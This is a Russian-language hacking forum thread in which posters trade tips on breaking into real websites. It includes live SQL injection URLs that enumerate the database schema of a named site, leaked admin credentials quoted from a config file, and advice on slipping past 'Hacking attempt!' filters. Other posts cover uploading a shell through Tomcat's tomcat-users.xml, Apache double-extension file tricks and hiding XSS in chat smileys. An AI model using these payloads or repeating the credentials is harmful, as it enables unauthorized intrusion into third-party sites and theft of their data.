Как уже поведал мне товарисч razb, эрроры у тебя из за того, что template в языке С - это ключевое слово, а у тебя это переменная. Переименой ее.
Не получается потому что там 3я версия мускула,поэтому объеденить два select'а не выйдет. Хоть ты и не просил,вот в конфиге прочитал: $admpasswd='Ultra'; $admlogin='admin';
Люди сорри,наверняка возникала такая проблема,но все страницы долго читать)последнее время когда натыкаюсь на новые сайты со скулем хочу проверить их на иньекцию.при любом запросе вылетает белый лист с надписью hacking attempt!перевод то я понимаю,но вот никак понять не могу,можно ли я эту надпись как то обойти и дальше поковырять базу,или сразу понятно что даже если уязвимость есть,ею не воспользоваться?
На разных сайтах это организовываеться по разному,своровали с DLE Но в основном,просто либо PHP: if(!intval(var)){ echo 'Hacking attempt!'; } or PHP: if(preg_match('#\'|union|select|...#isU',var)){ echo 'Hacking attempt!'; } Ну или подобные варианты,на парсинг QUERY_STRING целиком. Так что тут под каждй случай в отдельности нужно искать обход. Или копать в другую сторону.
сталкнулся сейчас с такой вещью как Tomcat Server Administration, кто подскажет где мне на никсовой тачке искать tomcat-users.xml с паролями? и если я туда получю доступ есть ли шансы залить шелл? поделитесь опытом (=
нужный тебе файл хранится в Code: $CATALINA_HOME/conf/tomcat-users.xml , где $CATALINA_HOME, папка, указанная при установке сервера приложений
А к в каких случаях/версиях Апач выполняет предыдущий тип файла, если не знает основной? Например, shell.php.qwe . У меня на win, в денвере работает, а на хостингах что-то нет ;/
Хмм...а есть где нить отдельная тема про эту фичу?насколько я понял сейчас у меня с сайтом ситуация номер 2.может намекнёшь как ее обойти?
Знаю ток насчет xss,раньше вроде можно было делать через смайлы.(т.е.ты на свое сайте делаешь скрипт,скрываешь его под картинкой и вставляешь этот смайл в чате на юкозе)поищи что то подобное.а по поводу скуля вроде как нет.
чем может быть объяснено следующее: у директории на сервере права drwxrwxrwx но записать в нее ничего не удается ни с помощью PHP ни с помощью INTO DUMPFILE в mysql. Места на диске хватает с избытком. Если смотреть stderr неудачного создания файла(например с помощью wget) то там лаконичное "permission denied"..
Ребята, помогите разобраться. Нет сил уже, все перепробовал - не могу найти ничего полезного... Может быть так, что в базе нет логина и пароля? http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,schema_name,3,4+from+information_schema.schemata/* http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,column_name,3,4+from+information_schema.columns+where+table_schema=0x64625F70726F6D74726163746F72/*
Вопрос такой: как находить прямой пусть до папки атачей? заливаю файл ,а куда понять не могу,скачать могу чере site.com/file.php?id=1 спасибо